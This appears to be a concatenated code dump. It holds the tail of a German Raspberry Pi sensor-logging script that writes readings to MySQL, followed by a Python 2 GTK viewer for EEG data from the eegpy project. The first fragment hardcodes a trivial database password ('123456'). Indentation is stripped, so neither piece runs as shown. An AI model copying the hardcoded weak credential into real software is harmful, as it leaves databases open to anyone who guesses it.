def mitMySQLVerbinden():
global mydb
mydb = mysql.connector.connect(
host="localhost",
user="airinfo",
password="123456", #Hier natürlich wieder ein sehr sicheres Passwort.
database="airinfo"
)
#Speichert die von den Sonsoren empfangenen Daten auf den MySQL-Server in den richtigen Tabellen ab.
def datenSpeichern(temperatur, luftdruck, feuchtigkeit):
#Speicherung der Daten in "woche".
zeiger = mydb.cursor()
sql = "INSERT INTO woche (temperatur, luftdruck) VALUES (%s, %s)"
daten = (temperatur, luftdruck)
zeiger.execute(sql, daten)
mydb.commit()
if benutzeLED:
#Die Funktion wird asyncron durch Threading aufgerufen, sodass in der Zwischenzeit gemessen werden kann.
Thread(target=farbeAnzeigen, args=("blau",0.1)).start() #Zeigt mit einen blauen LED für eine Sekunde an, dass der gerade Daten abgespeichert werden.
akuelleZeit = time.localtime()
if time.strftime("%M", akuelleZeit) == "00" and time.strftime("%S", akuelleZeit) == "00": #Überprüft, ob es gerade eine volle Stunde ists
#Falls ja, werden die Sensordaten auch in "insgesamt" gespeichert.
zeiger = mydb.cursor()
sql = "INSERT INTO gesamt (temperatur, luftdruck) VALUES (%s, %s)"
daten = (temperatur, luftdruck)
zeiger.execute(sql, daten)
mydb.commit()
if benutzeLED:
#Die Funktion wird asyncron durch Threading aufgerufen, sodass in der Zwischenzeit gemessen werden kann.
Thread(target=farbeAnzeigen, args=("blau",0.1)).start() #Zeigt mit einen blauen LED für eine Sekunde an, dass der gerade Daten abgespeichert werden.
#Enfernt Daten, die älter sind als 7 Tage aus "woche"
def datenBereinigen():
zeiger = mydb.cursor()
sql = "DELETE FROM woche WHERE `zeitpunkt` < DATE_ADD(CURDATE(), INTERVAL -7 DAY)"
zeiger.execute(sql)
mydb.commit() |
viewerwidgets.py | # -*- coding: utf-8 -*-
import os.path
import sys
import time
from threading import Thread, Lock
import pickle
#Eigene Imports
import eegpy
from eegpy.formats import f32
from eegpy.misc import FATALERROR
from eegpy.ui.icon import image_from_eegpy_stock, eegpy_logo
from eegpy.ui.widgets.dialogwidgets import show_info_dialog
from markerwidgets import Marker, MarkerWithAverage
from trigmanwidgets import TriggerManager
from eegpy.analysis.wavelet import wavedec_lin
try:
import pygtk
pygtk.require('2.0')
import gobject
import gtk
except ImportError:
raise FATALERROR('GTK cannot be imported.')
from numpy import *
try:
import matplotlib
from matplotlib.axes import Subplot
from matplotlib.mlab import specgram
# uncomment to select /GTK/GTKAgg/GTKCairo
from matplotlib.backends.backend_gtk import FigureCanvasGTK as FigureCanvas
# or NavigationToolbar for classic
from matplotlib.backends.backend_gtk import NavigationToolbar2GTK as NavigationToolbar
#from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg, NavigationToolbar
from matplotlib.figure import Figure, SubplotParams
from matplotlib.axis import Axis
import matplotlib.cm as cm
except ImportError:
raise FATALERROR('Error while importing matplotib. Please visit http://matplotlib.sf.net for more information.')
try:
import pywt
except ImportError:
raise FATALERROR('PyWavelet not found.')
class EEGPlot:
programName = "eegpy Viewer 0.0.3"
offset=100
f32Loaded = False
chList = []
data=[]
ovData = []
ovTs = []
ts=[]
fn = "/media/Extern/public/Experimente/AudioStroop/2008-01-21_Leon_AS/eeg/leon_leerlauf_f.f32" #None
reader = None
markerfilename = None
markerparser = None
markMaker=None
trigManager=None
timesOffset = 0
tsFactor = 1 #Faktor für Umrechnung der Zeiten, wird wichtig beim zeichnen der Markers
boolPlotMarkers = True
OvThread = None
f32Lock = Lock()
panePosDef = 0
showAnalysis = False # Wenn True, dann wird eine Analyse des ersten ausgewählten Kanals gezeigt.
whichAnal = "Specgram"
# Konstruktor
def __init__(self,fn=None):
gobject.threads_init()
self.setupGUI()
if fn==None:
self.set_filename("/media/Extern/public/Experimente/AudioStroop/2008-01-21_Leon_AS/eeg/leon_leerlauf_f.f32")
else:
self.set_filename(fn)
# Our callback.
# The data passed to this method is printed to stdout
def callback(self, widget, data=None):
print "Hello again - %s was pressed" % data
def cb_plot(self,widget,data=None):
self.plot()
def cb_plotOverview(self,widget,data=None):
self.plot_overview()
def cb_canvas(self, event):
if event.inaxes == self.a2:
#print "In Übersicht"
self.sbStartpoint.set_value(event.xdata)
self.plot()
elif event.inaxes == self.a:
#print event.xdata, event.ydata
if self.markMaker != None:
self.markMaker.add(event.xdata)
self.plot_data()
#pass
#mrkr = Marker()
def cb_col_toggled( self, cell, path, user_data):
model, column = user_data
model[path][column] = not model[path][column]
#print model, path, model[path][column]
if column == 2:
self.plot()
else:
self.plot_data()
return
def cb_MvAccels(self, action):
#print "Hallo",
#print action.get_name()
if not self.f32Loaded:
return False
start=int(self.sbStartpoint.get_value())
length=int(self.sbNDataP.get_value())
stride=int(self.sbStride.get_value())
if action.get_name() == "Llleft":
start=start-int(5*length*stride)
elif action.get_name() == "Lleft":
start=start-int(1*length*stride)
elif action.get_name() == "Left":
start=start-int(0.2*length*stride)
elif action.get_name() == "Right":
start=start+int(0.2*length*stride)
elif action.get_name() == "Rright":
start=start+int(1*length*stride)
elif action.get_name() == "Rrright":
start=start+int(5*length*stride)
if start < 0:
start=0
if start+stride*length>self.reader.numDatapoints:
start=self.reader.numDatapoints-stride*length
self.sbStartpoint.set_value(start)
self.plot()
def cb_MvButtons(self, widget):
if not self.f32Loaded:
return False
start=int(self.sbStartpoint.get_value())
length=int(self.sbNDataP.get_value())
stride=int(self.sbStride.get_value())
if widget == self.btLlleft:
start=start-int(5*length*stride)
elif widget == self.btLleft:
start=start-int(1*length*stride)
elif widget == self.btLeft:
start=start-int(0.2*length*stride)
elif widget == self.btRight:
start=start+int(0.2*length*stride)
elif widget == self.btRright:
start=start+int(1*length*stride)
elif widget == self.btRrright:
start=start+int(5*length*stride)
if start < 0:
start=0
if start+stride*length>self.reader.numDatapoints:
start=self.reader.numDatapoints-stride*length
self.sbStartpoint.set_value(start)
#self.plot()
def cb_SelAccels(self, action):
def select(model, path, iter,data):
if data=="all":
model.set_value(iter,2,True)
elif data=="none":
model.set_value(iter,2,False)
return False # keep the foreach going
#print "Hallo",
#print action.get_name()
if not self.f32Loaded:
return False
if action.get_name() == "PlotAll":
self.tree.foreach(select,"all")
elif action.get_name() == "PlotNone":
self.tree.foreach(select,"none")
self.setup_subplots()
self.plot()
def cb_activate_radio_action(self, action, current):
self.whichAnal = current.get_name()
self.plot_data()
#print 'Radio action "%s" selected, %s'% (current.get_name(),action.get_name())
def cb_SpinBs(self, widget):
if not self.f32Loaded:
return False
if widget in [self.sbStartpoint, self.sbNDataP, self.sbStride]:
self.setup_subplots()
self.plot()
elif widget == self.sbScale:
self.offset = self.sbScale.get_value()
#print "Offset: %f" % self.offset
self.plot_data()
def cb_showAnalysis(self, widget):
if widget == self.btAnal:
self.showAnalysis = not self.showAnalysis
self.setup_subplots()
self.plot()
def cb_open(self, b):
dialog = gtk.FileChooserDialog("Open f32-File..", None, gtk.FILE_CHOOSER_ACTION_OPEN, (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK))
dialog.set_default_response(gtk.RESPONSE_OK)
filter = gtk.FileFilter()
filter.set_name("EEG f32")
filter.add_pattern("*.f32")
dialog.add_filter(filter)
filter = gtk.FileFilter()
filter.set_name("All files")
filter.add_pattern("*")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.set_filename(dialog.get_filename())
#print dialog.get_filename(), 'selected'
elif response == gtk.RESPONSE_CANCEL:
print 'Closed, no files selected'
dialog.destroy()
pass
def cb_startMarking(self, b):
if self.markMaker == None:
self.markMaker = MarkerWithAverage(self)
else:
try:
self.markMaker.window.show_all()
except AttributeError,e:
"markMaker ist irgendwie falsch..."
def cb_manageTriggers(self, b):
if self.trigManager == None:
self.trigManager = TriggerManager(self)
else:
try:
self.trigManager.window.show()
#self.trigManager.mainBox.show_all()
except AttributeError,e:
"trigManager ist irgendwie falsch..."
def cb_about(self, b):
text = """This is the %s.
It is the EEG-Viewer supplied with eegpy, an open-source project
for the analysis of eeg-data.
More informations are available at our website, http://eegpy.sf.net."""%(self.programName)
show_info_dialog("About",text)
def cb_quit(self, b):
self.window.hide()
gtk.main_quit()
def addLine(self, widget, data=None):
#print "Hello again - %s was pressed" % data
iter = self.tree.insert_before(None, None)
self.tree.set_value(iter, 0, 1)
self.tree.set_value(iter, 1, data)
# This callback quits the program
def delete_event(self, widget, event, data=None):
gtk.main_quit()
return False
def set_filename(self, fn):
"""Set the filename to use, check if file exists and start f32reader """
self.fn = fn
self.chList = []
self.data=[]
self.ovData = []
self.ovTs = []
self.f32Loaded = False
if os.path.exists(self.fn):
try:
self.reader = f32.F32(self.fn,"r")
self.f32Loaded = True
self.window.set_title(self.programName + " - " + self.fn)
#Kanalliste füllen
self.tree.clear()
#base = self.tree.append(None)
#self.tree.set(base ,1,"Channels:")
i=0
for c in self.reader.channel_names:
iter = self.tree.append(None)
self.tree.set(iter, 0,i , 1,c, 2,True, 3,False)
#print i, c
#self.tree.set_value(iter, 0, c)
i += 1
self.pane.set_position(self.panePosDef)
#self.scale_startpoint["to"] = self.reader.numDatapoints-self.scale_nDataP["from"]-1
self.sbStartpoint.set_adjustment(gtk.Adjustment(0,0,self.reader.numDatapoints-100-1,100,1000))
self.a.clear()
#self.plot()
#Übersicht plotten
#gtk.gdk.threads_enter()
#self.OvThread = Thread(target=self.getOvData)
#self.OvThread.start()
self.get_overview_data()
evt_exts = [".evt",".vmrk"]
for e in evt_exts:
if os.path.exists(os.path.splitext(self.fn)[0]+e):
self.cb_manageTriggers(None)
self.trigManager.add(os.path.splitext(self.fn)[0]+e)
break
self.plot()
#gtk.gdk.threads_leave()
except Exception, e:
self.fn= None
#tkMessageBox.showwarning("Falsches Format","Dies ist keine gültige f32-Datei!")
print e
def setupGUI(self):
# Create a new window
self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window.set_default_size(700,500)
self.window.set_title(self.programName)
# Set a handler for delete_event that immediately
# exits GTK.
self.window.connect("delete_event", self.delete_event)
# Sets the border width of the window.
self.window.set_border_width(0)
self.mainBox = gtk.VBox()
self.window.add(self.mainBox)
self.setup_menu()
self.hpane = gtk.HPaned()
self.mainBox.pack_start(self.hpane)
self.pane = gtk.VPaned()
self.hpane.add1(self.pane)
#self.window.add(self.pane)
#self.upperTable = gtk.Table(1, 3)
self.bTable = gtk.Table(3, 6, True)
self.vbox = gtk.VBox()
self.hbox = gtk.HBox()
self.hbox2 = gtk.HBox()
self.pane.add1(self.hbox)
self.pane.add2(self.hbox2)
self.hbox2.pack_start(self.vbox)
self.setup_SpinBoxes()
self.setup_buttons()
self.setup_canvas()
self.vbox.pack_start(self.toolbar, False, False)
self.setup_TreeView()
self.window.set_icon_list(eegpy_logo("small"))#, eegpy_logo("large"))
self.window.show_all()
self.panePosDef = self.pane.get_position()
def setup_menu(self):
self.ui = '''<ui>
<menubar name="MenuBar">
<menu action="File">
<menuitem action="Open"/>
<menuitem action="Marks"/>
<menuitem action="Triggers"/>
<separator/>
<menuitem action="Quit"/>
</menu>
<menu action="Movement">
<menuitem action="Llleft"/>
<menuitem action="Lleft"/>
<menuitem action="Left"/>
<menuitem action="Right"/>
<menuitem action="Rright"/>
<menuitem action="Rrright"/>
</menu>
<menu action="ChSel">
<menuitem action="PlotAll"/>
<menuitem action="PlotNone"/>
<menuitem action="PlotMarked"/>
<menuitem action="NotPlotMarked"/>
</menu>
<menu action="Analysis">
<menuitem action="Specgram"/>
<menuitem action="XCorr"/>
<menuitem action="Avg"/>
<menuitem action="Wavelet"/>
</menu>
<menu action="Help">
<menuitem action="About"/>
</menu>
</menubar>
</ui>'''
# Create a UIManager instance
self.uimanager = gtk.UIManager()
# Add the accelerator group to the toplevel window
self.accelgroup = self.uimanager.get_accel_group()
self.window.add_accel_group(self.accelgroup)
# Create an ActionGroup
actiongroup = gtk.ActionGroup('UIManagerExample')
self.actiongroup = actiongroup
# Create a ToggleAction, etc.
#actiongroup.add_toggle_actions([('Mute', None, '_Mute', '<Control>m',
# 'Mute the volume', self.mute_cb)])
# Create actions
actiongroup.add_actions([('Open', gtk.STOCK_OPEN, '_Open f32-file', None, 'Open an f32-file from the file-system', self.cb_open),
('Marks', None, '_Mark time-points', "<Control>m", 'Mark timepoints in file for later use', self.cb_startMarking),
('Triggers', None, 'Manage _trigger-files', "<Control>t", 'Manage the external trigger-files used for displaying certain events in the eeg.', self.cb_manageTriggers),
('Quit', gtk.STOCK_QUIT, '_Quit me!', None,'Quit the Program', self.cb_quit),
('File', None, '_File'),
('Movement', None, '_Movement'),
('Analysis', None, '_Analysis'),
('Mute', None, '_Mute'),
('Llleft', None, "5x Left" , "<Control><Alt><Shift>Left", "Llleft", self.cb_MvAccels),
('Lleft', None, "1x Left" , "<Control><Alt>Left", "Lleft", self.cb_MvAccels),
('Left', None, "0.2x Left" , "<Control>Left", "Left", self.cb_MvAccels),
('Right', None, "0.2x Right" , "<Control>Right", "Right", self.cb_MvAccels),
('Rright', None, "1x Right" , "<Control><Alt>Right", "Rright", self.cb_MvAccels),
('Rrright', None, "5x Right" , "<Control><Alt><Shift>Right", "Rrright", self.cb_MvAccels)])
actiongroup.add_actions([('ChSel', None, '_Channel-Selection'),
('PlotAll', None, 'Mark all channels for plotting', None, 'Mark all channels for plotting', self.cb_SelAccels),
('PlotNone', None, "Unmark all channels" , None, None, self.cb_SelAccels),
('PlotMarked', None, "Mark selected channels" , None, None, self.cb_SelAccels),
('NotPlotMarked', None, "Unmark selected" , None, None, self.cb_SelAccels)])
actiongroup.add_actions([('About', None, "About" , None, None, self.cb_about),
('Help', None, '_Help')])
(ANAL_SPEC,ANAL_XCORR,ANAL_AVG) = range(3)
anal_entries = (
( "Specgram", None, # name, stock id
"_Spectogram", None, # label, accelerator
"Show a spectogram in the Analysis-window", ANAL_SPEC ), # tooltip, value
( "XCorr", None, # name, stock id
"_Cross-correlation", None, # label, accelerator
"Compute the cross-correlation", ANAL_XCORR ), # tooltip, value
( "Avg", None, # name, stock id
"_Average over channels", None, # label, accelerator
"Compute the average over channels", ANAL_AVG ), # tooltip, value
( "Wavelet", None, # name, stock id
"_Wavelet", None, # label, accelerator
"Wavelet-decomposition of the signal", ANAL_AVG )
)
actiongroup.add_radio_actions(anal_entries, ANAL_SPEC, self.cb_activate_radio_action)
#actiongroup.get_action('Quit').set_property('short-label', '_Quit')
# Add the actiongroup to the uimanager
self.uimanager.insert_action_group(actiongroup, 0)
# Add a UI description
self.uimanager.add_ui_from_string(self.ui)
# Create a MenuBar
self.menuBar = self.uimanager.get_widget('/MenuBar')
self.frMenuBar = gtk.Frame()
self.frMenuBar.set_property("shadow-type", gtk.SHADOW_OUT)
#self.menuBar = gtk.MenuBar()
self.frMenuBar.add(self.menuBar)
#self.frMenuBar.show_all()
self.mainBox.pack_start(self.frMenuBar,expand=False)
def setup_SpinBoxes(self):
self.frameSBs = gtk.Frame("Adjust View")
self.hbox.pack_start(self.frameSBs,expand=False,padding=50)
self.tableSBs = gtk.Table(4,2,False)
self.frameSBs.add(self.tableSBs)
self.tableSBs.attach(gtk.Label("Start"),0,1,0,1)
self.sbStartpoint = gtk.SpinButton(gtk.Adjustment(0,0,10000,100,1000))
self.sbStartpoint.connect("value_changed",self.cb_SpinBs)
self.tableSBs.attach(self.sbStartpoint,1,2,0,1)
self.tableSBs.attach(gtk.Label("Datapoints"),0,1,1,2)
self.sbNDataP = gtk.SpinButton(gtk.Adjustment(1100,100,20000,100,1000))
self.sbNDataP.connect("value_changed",self.cb_SpinBs)
self.tableSBs.attach(self.sbNDataP,1,2,1,2)
self.tableSBs.attach(gtk.Label("Stepsize"),0,1,2,3)
self.sbStride = gtk.SpinButton(gtk.Adjustment(5,1,400,1,100))
self.sbStride.connect("value_changed",self.cb_SpinBs)
self.tableSBs.attach(self.sbStride,1,2,2,3)
self.tableSBs.attach(gtk.Label("Scale"),0,1,3,4)
self.sbScale = gtk.SpinButton(gtk.Adjustment(100,1,10000,10,100))
self.sbScale.connect("value_changed",self.cb_SpinBs)
self.tableSBs.attach(self.sbScale,1,2,3,4)
for i in [self.sbStartpoint, self.sbNDataP, self.sbStride, self.sbScale]:
i.set_numeric(True)
def setup_buttons(self):
# Create move-buttons
self.btLlleft = gtk.Button("<<<")
self.btLlleft.connect("clicked", self.cb_MvButtons)
self.bTable.attach(self.btLlleft, 0, 1, 0, 1)
#self.btLlleft.show()
self.btLleft = gtk.Button("<<")
self.btLleft.connect("clicked", self.cb_MvButtons)
self.bTable.attach(self.btLleft, 1, 2, 0, 1)
#self.btLleft.show()
self.btLeft = gtk.Button("<")
self.btLeft.connect("clicked", self.cb_MvButtons)
self.bTable.attach(self.btLeft, 2, 3, 0, 1)
#self.btLeft.show()
self.btRight = gtk.Button(">")
self.btRight.connect("clicked", self.cb_MvButtons)
self.bTable.attach(self.btRight, 3, 4, 0, 1)
#self.btRight.show()
self.btRright = gtk.Button(">>")
self.btRright.connect("clicked", self.cb_MvButtons)
self.bTable.attach(self.btRright, 4, 5, 0, 1)
#self.btRright.show()
self.btRrright = gtk.Button(">>>")
self.btRrright.connect("clicked", self.cb_MvButtons)
self.bTable.attach(self.btRrright, 5, 6, 0, 1)
#self.btRrright.show()
# Create "Plot" buttons
self.btPlot = gtk.Button("Plot")
self.btPlot.connect("clicked", self.cb_plot)
self.bTable.attach(self.btPlot, 0, 3, 1, 2)
#self.btPlot.show()
self.btPlotOv = gtk.Button("Plot Overview")
self.btPlotOv.connect("clicked", self.cb_plotOverview)
self.bTable.attach(self.btPlotOv, 3, 6, 1, 2)
#self.btPlotOv.show()
#Radio-Buttons
self.lbTime = gtk.Label("Time:")
self.bTable.attach(self.lbTime,0,1,2,3)
self.rbSamples = gtk.RadioButton(None,"#")
self.rbSamples.connect("clicked", self.cb_plot)
self.bTable.attach(self.rbSamples,1,2,2,3)
self.rbSecs = gtk.RadioButton(self.rbSamples,"s")
self.rbSecs.connect("clicked", self.cb_plot)
self.bTable.attach(self.rbSecs,2,3,2,3)
self.rbMins = gtk.RadioButton(self.rbSamples,"m")
self.rbMins.connect("clicked", self.cb_plot)
self.bTable.attach(self.rbMins,3,4,2,3)
self.rbHours = gtk.RadioButton(self.rbSamples,"h")
self.rbHours.connect("clicked", self.cb_plot)
self.bTable.attach(self.rbHours,4,5,2,3)
self.rbDays = gtk.RadioButton(self.rbSamples,"d")
self.rbDays.connect("clicked", self.cb_plot)
self.bTable.attach(self.rbDays,5,6,2,3)
self.hbox.pack_start(self.bTable, False, padding=50)
self.bTable2 = gtk.Table(1, 1, True)
self.btAnal = gtk.Button("Show/Hide Analysis")
self.btAnal.connect("clicked", self.cb_showAnalysis)
self.bTable2.attach(self.btAnal,0,1,0,1)
self.hbox.pack_start(self.bTable2, False, padding=50)
def setup_canvas(self):
self.f = Figure(figsize=(5,4), dpi=100, subplotpars=SubplotParams(left=0.06, top=0.95, right=0.97, bottom=0.1,hspace=0))
self.setup_subplots()
self.canvas = FigureCanvas(self.f)
#self.canvas.show()
self.vbox.pack_start(self.canvas)
#self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1)
self.toolbar = NavigationToolbar( self.canvas, self.window )
self.canvas.mpl_connect('button_press_event', self.cb_canvas)
def setup_subplots(self):
self.f.clear()
if self.showAnalysis:
self.a = self.f.add_subplot(212)
self.a2 = self.f.add_subplot(414)
self.a3 = self.f.add_subplot(211)
self.subplAxes = self.f.get_axes()
self.subplAxes[0].set_position([0.06,0.05,0.91,0.50])
self.subplAxes[2].set_position([0.06,0.55,0.91,0.35])
self.subplAxes[1].set_position([0.06,0.96,0.91,0.02])
self.subplAxes[1].set_xticks([])
self.subplAxes[1].set_yticks([])
else:
self.a = self.f.add_subplot(111)
self.a2 = self.f.add_subplot(414)
self.a3 = None
self.subplAxes = self.f.get_axes()
self.subplAxes[1].set_position([0.06,0.96,0.91,0.02])
self.subplAxes[1].set_xticks([])
self.subplAxes[1].set_yticks([])
#self.a.autoscale_view(tight=True)
#self.subplAxes[0].set_position(0,0.1,1,0.9)
#self.subplAxes[1].set_aspect(0.01)
#self.subplAxes[1].set_yscale('log')
def setup_TreeView(self):
self.tvScrolledWin = gtk.ScrolledWindow()
self.tvScrolledWin.set_policy(gtk.POLICY_AUTOMATIC,gtk.POLICY_AUTOMATIC)
self.tree = gtk.TreeStore(gobject.TYPE_INT, gobject.TYPE_STRING, gobject.TYPE_BOOLEAN, gobject.TYPE_BOOLEAN)
self.treeV = gtk.TreeView(self.tree)
self.treeV.get_selection().set_mode(gtk.SELECTION_MULTIPLE)
renderer = gtk.CellRendererText()
self.col1 = gtk.TreeViewColumn("Number", renderer,text=0)
self.col1.set_resizable(True)
self.col1.set_min_width(20)
#self.col1.set_sizing(gtk.TREE_VIEW_COLUMN_AUTOSIZE)
self.treeV.append_column(self.col1)
self.col2 = gtk.TreeViewColumn("Channel Name", renderer, text=1)
self.col2.set_resizable(True)
self.col2.set_min_width(20)
self.treeV.append_column(self.col2)
#Dritte Spalte für Highlight
renderer1 = gtk.CellRendererToggle()
renderer1.set_property('activatable', True)
renderer1.connect("toggled", self.cb_col_toggled, (self.tree, 2))
self.col3 = gtk.TreeViewColumn("Plot?", renderer1, active=2)
self.col3.set_resizable(True)
self.col3.set_min_width(20)
self.treeV.append_column(self.col3)
renderer2 = gtk.CellRendererToggle()
renderer2.set_property('activatable', True)
renderer2.connect('toggled', self.cb_col_toggled, (self.tree, 3))
self.col4 = gtk.TreeViewColumn("-", renderer2, active=3)
self.col4.set_resizable(True)
self.col4.set_min_width(20)
self.treeV.append_column(self.col4)
#self.treeV.show()
self.tvScrolledWin.add(self.treeV)
#self.tvScrolledWin.show_all()
#self.hbox.pack_start(self.tvScrolledWin)
self.hpane.add2(self.tvScrolledWin)
def plot(self):
if not self.f32Loaded:
return False
#Zuerst Start und Stride zurecht schieben
start=int(self.sbStartpoint.get_value())
length=int(self.sbNDataP.get_value())
stride=int(self.sbStride.get_value())
if length*stride>self.reader.numDatapoints:
stride = self.reader.numDatapoints/length
self.sbStride.set_value(stride)
if start+stride*length>self.reader.numDatapoints:
start=self.reader.numDatapoints-stride*length
self.sbStartpoint.set_value(start)
#Dann DAten holen
#tStart = time.time()
self.get_data()
#print "getData: Dauer: ", time.time()-tStart, "s"
if self.chList == []:
return False
#Dann Daten plotten
#tStart = time.time()
self.plot_data()
#print "plotData. Dauer: ", time.time()-tStart, "s"
try:
self.plot_overview_data()
pass
except Exception:
pass
def plot_overview(self):
if not self.f32Loaded:
return False
#Zuerst Start und Stride zurecht schieben
self.sbStartpoint.set_value(0)
if (self.sbStride.get_range()[1]*self.sbNDataP.get_value())<self.reader.numDatapoints:
self.sbNDataP.set_value(self.reader.numDatapoints/self.sbStride.get_range()[1])
self.sbStride.set_value(self.sbStride.get_range()[1])
else:
self.sbStride.set_value(self.reader.numDatapoints/self.sbNDataP.get_value())
self.plot()
def get_data(self):
#Zeit stoppen
#tStart = time.time()
#Test des lw
self.chList = []
#(model,paths) = self.treeV.get_selection().get_selected_rows()
for item in self.tree:
#print "---",item
if item[2]:
#print " ---",item[0]
self.chList.append(item[0])
#print item, model[item], model[item][0], model[item][1]
#print self.chList
#print "Welche Kanäle sind gewählt? Dauer: ", time.time()-tStart, "s"
#tStart = time.time()
if self.chList == []:
return False
start=int(self.sbStartpoint.get_value())
length=int(self.sbNDataP.get_value())
stride=int(self.sbStride.get_value())
#if self.scale_strideMulti.get()>0:
# stride = stride*self.scale_strideMulti.get()
#print "Start/Laenge/Schritt? Dauer: ", time.time()-tStart, "s"
tStart=time.time()
self.f32Lock.acquire()
self.data = self.reader.getData(start,length,stride,self.chList)
self.f32Lock.release()
#print "Daten holen. Dauer: ", time.time()-tStart, "s"
#tStart = time.time()
self.get_times()
#print "getTimes: Dauer: ", time.time()-tStart, "s"
#self.ts = [(start+n*stride) for n in range(length)]
pass
def plot_data(self):
#print self.data
#print self.data.shape
self.canvas.hide()
if self.chList == []:
print "Keine Kanaele"
return False
self.a.clear()
self.subplAxes[0].grid(color='#AAAAAA', linestyle='--', linewidth=0.5)
#Daten umschreiben mit Offset
#print "Starte umschreiben"
plotdata = zeros(self.data.shape,"d")
i=0
#tStart = time.time()
for d in range(self.data.shape[1]):
#plotdata.append([(v-i*self.offset) for v in d])
plotdata[:,d] = self.data[:,d]-i*self.offset
i+=1
#dataObj = []
#print "Umschreiben fertig"
#print "plotdata machen. Dauer: ", time.time()-tStart, "s"
#print plotdata, plotdata.shape
#tStart = time.time()
#Plotte die Zeitreihe. Überprüfe, ob der Kanal highlighted werden soll
#(model,paths) = self.treeV.get_selection().get_selected_rows()
sgData = []#None
plotColor="k"
self.a.plot(self.ts,plotdata,plotColor,linewidth=0.5)
for i in range(plotdata.shape[1]):
#print len(self.ts), len(plotdata[:,i])
if self.tree[self.chList[i]][3]:
self.a.plot(self.ts,plotdata[:,i],"r",linewidth=0.5)
# plotColor = "r"
#if sgData == None:
# sgData = plotdata[:,i]
sgData.append(plotdata[:,i])
#tPlotStart=time.time()
#self.a.plot(self.ts,plotdata[:,i],plotColor,linewidth=0.5)
#print "Einen Kanal plotten. Dauer: ", time.time()-tPlotStart, "s"
#print i
#print "Zeitreihen plotten. Dauer: ", time.time()-tStart, "s"
#ytics verändern
if self.offset > 0:
ytics = [-(y*self.offset) for y in range(len(self.chList))]
yticsNames = [self.reader.channel_names[i] for i in self.chList]
self.subplAxes[0].set_yticks(ytics)
self.subplAxes[0].set_yticklabels(yticsNames)
else:
self.subplAxes[0].set_yticks([])
#self.a.set_xlim
#self.a.autoscale_view(tight=True, scaley=False)
#self.a.autoscale_view(tight=False,scalex=False, scaley=True)
#Plotte Marker
if(self.boolPlotMarkers):
self.plot_markers()
#xlim/ylim anpassen
minx = min(self.ts)
maxx = max(self.ts)
#print minx, maxx
self.subplAxes[0].set_xlim((minx, maxx))
if self.offset > 0:
self.subplAxes[0].set_ylim(0-(len(self.chList)-1)*self.offset-self.offset,self.offset)
else:
self.subplAxes[0].set_ylim(-self.offset,self.offset)
#Show some analysis?
if self.showAnalysis:
try:
self.a3.clear()
except Exception:
print "Fehler beim Clearen von a3"
pass
if self.whichAnal == "Specgram":
#print "sg"
if len(sgData) > 0:
#print "sg2"
self.a3.specgram(sgData[0],Fs=self.reader.samplRate/self.sbStride.get_value())
#Pxx = None
#for s in sgData:
#if Pxx == None:
# res = specgram(s,Fs=self.reader.samplRate/self.sbStride.get_value())
# Pxx=res[0]
# freqs = res[1]
#else:
# Pxx = Pxx + specgram(s,Fs=self.reader.samplRate/self.sbStride.get_value())[0]
#print Pxx
#print Pxx.shape
#im = self.a3.imshow(Pxx,extent=(0,1,freqs[0],freqs[-1]),interpolation="nearest", origin="lower",aspect="auto",cmap=cm.hot)
#self.f.colorbar(im)
self.a3.set_xticks([])
elif self.whichAnal == "XCorr":
#print "xc"
if len(sgData) >= 2:
#print "xc"
tmpData = correlate(sgData[0],sgData[1],mode="same")
#print tmpData.shape, sgData[0].shape, sgData[1].shape
self.a3.plot(tmpData)
elif self.whichAnal == "Avg":
#print "xc"
if len(sgData) >= 2:
#print "xc"
tmpData = sgData[0]
for i in range(1,len(sgData)):
tmpData+=sgData[i]
tmpData /= len(sgData)
self.a3.plot(tmpData)
elif self.whichAnal == "Wavelet":
#print "xc"
if len(sgData) >= 1:
tmpData = sgData[0]
#wts = wavedec_lin(tmpData,"db4")
#self.a3.plot(wts)
mld = pywt.wavedec(tmpData, "db4")
#print mld
level=0
self.a3.plot(linspace(0,len(tmpData),mld[-1].shape[0]),mld[-1],label=str(level))
self.a3.twinx()
for sc in mld[:-1]:
self.a3.plot(linspace(0,len(tmpData),sc.shape[0]),sc,label=str(level))
level+=1
self.a3.legend()
sys.stdout.flush()
#self.hpane.set_position(self.hpane.get_position()-1
self.canvas.show()
#print "Fertig show"
def get_overview_data(self):
#self.ovData = self.reader.get
#print "Starte getOvData"
#self.f32Lock.acquire()
#tmpData = self.reader.getOverviewData(100)
#self.f32Lock.release()
#self.ovData = tmpData.mean(1)
#self.ovTs = range(0,self.reader.numDatapoints,self.reader.numDatapoints/tmpData.shape[0])[:100]
#self.plotOvData()
self.f32Lock.acquire()
tmpData = self.reader.getOverviewData(1000,range(0,len(self.reader.channel_names),2))
self.f32Lock.release()
self.ovData = tmpData.mean(1)
self.ovTs = range(0,self.reader.numDatapoints,self.reader.numDatapoints/tmpData.shape[0])[:1000]
self.setup_subplots()
self.plot_overview_data()
def plot_overview_data(self):
#self.canvas.hide()
self.a2.clear()
self.a2.plot(self.ovTs, self.ovData)
self.subplAxes[1].set_xticks([])
self.subplAxes[1].set_yticks([])
self.a2.autoscale_view(tight=True)
#read scales
start=int(self.sbStartpoint.get_value())
length=int(self.sbNDataP.get_value())
stride=int(self.sbStride.get_value())
#set xmin and xmax for rectangle
xmin = start
xmax = start+stride*length
#plot rectangle
self.a2.axvspan(xmin,xmax,fc="g",alpha=0.4)
self.canvas.show()
def plot_markers(self):
"""Plottet alle Marker im betrachteten x-Bereich"""
